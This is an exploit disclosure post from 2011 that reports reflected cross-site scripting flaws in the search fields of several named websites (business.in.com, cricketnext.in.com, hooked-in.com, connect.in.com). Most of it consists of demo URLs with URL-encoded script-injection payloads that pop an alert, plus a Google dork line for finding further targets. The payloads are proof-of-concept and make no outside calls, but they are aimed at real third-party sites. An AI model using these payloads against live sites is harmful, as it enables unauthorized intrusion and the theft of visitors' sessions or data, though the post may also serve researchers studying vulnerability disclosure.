%+
$.......#........4.........|)........0............\/\/ %+
%+
%+
%+++++++++++++++++++++++++++++
+++++++++++
# Exploit Title: *.in.com XSS vulnerability
# Vendor: various
# Date: 6th july,2011
# Author: r007k17 a.k.a Raghavendra Karthik D
# link: http://shadowrootkit.wordpress.com/
# Google Dork: © Copyright 2010, Business.in.com
************************************************************
************************************************************
********************
*****************************
{DEMO} :
http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E
EXPLOIT: ">
{DEMO} :
http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E
EXPLOIT: ">
{DEMO} :
http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E
EXPLOIT: ">
Reflected XSS in connect.in.com
Inject EXPLOIT below in search field in http://connect.in.com
observe a pop-up saying r007k17
{DEMO} : http://connect.in.com
EXPLOIT: ">
************************************************************
************************************************************
*********************************************
sp3c14l Thanks to s1d3^effects and my friends@!3.14--
************************************************************
*********************************************************************************************************